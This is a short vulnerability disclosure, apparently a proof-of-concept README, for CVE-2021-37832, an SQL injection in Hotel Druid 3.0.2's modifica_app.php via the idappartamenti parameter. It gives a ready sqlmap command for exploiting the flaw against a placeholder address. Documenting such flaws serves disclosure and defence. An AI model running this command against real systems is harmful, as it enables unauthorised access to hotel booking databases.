CVE-2021-37832 - Hotel Druid 3.0.2 SQL Injection Vulnerability - 9.8 CVSS 3.1# CVE 2021-37832 Hotel Druid 3.0.2 SQL Injection Vulnerability
A SQL injection vulnerability exists in version 3.0.2 of Hotel Druid when SQLite is being used as the application database. A malicious attacker can issue SQL commands to the SQLite database through the vulnerable idappartamenti parameter.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37832
https://nvd.nist.gov/vuln/detail/CVE-2021-37832#match-6858716
Vulnerable PHP Page:
modifica_app.php - idappartamenti parameter
Vulnerable Payload
sqlmap -u "<ipaddress>/modifica_app.php?tipo_tabella=appartamenti&anno=2021&id_sessione=&idappartamenti=01" --level=3 --risk=2 --banner --dbms=sqlite
Discovered by Joe Helle, July 2021
[4.0K] /data/pocs/74c6c81cc28083d60aaa1136cfb9a1b9d2e04bd3
└── [ 704] README.md
0 directories, 1 file